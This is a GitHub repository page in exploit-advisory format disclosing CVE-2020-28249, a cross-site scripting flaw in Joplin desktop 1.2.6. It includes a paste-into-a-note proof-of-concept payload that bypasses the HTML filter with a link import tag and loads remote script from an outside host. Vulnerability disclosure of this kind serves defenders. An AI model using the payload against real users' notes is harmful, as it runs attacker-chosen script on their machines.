Skip to content

fhlip0/JopinXSS

Repository files navigation

Exploit Title: Joplin 1.2.6 Cross Site Scripting
Date: 2020-10-27
Exploit Author: Philip Holbrook (@fhlipZero)
Vendor Homepage: https://joplinapp.org/
Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
Version: 1.2.6
Tested on: Windows / Mac
CVE : CVE-2020-28249
References:
PENDING next release

  1. Technical Details An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter

  2. PoC Paste the following payload into a note:

<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
<script src="//brutelogic.com.br&sol;1.js&num; 
<script>alert(1)</script>

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published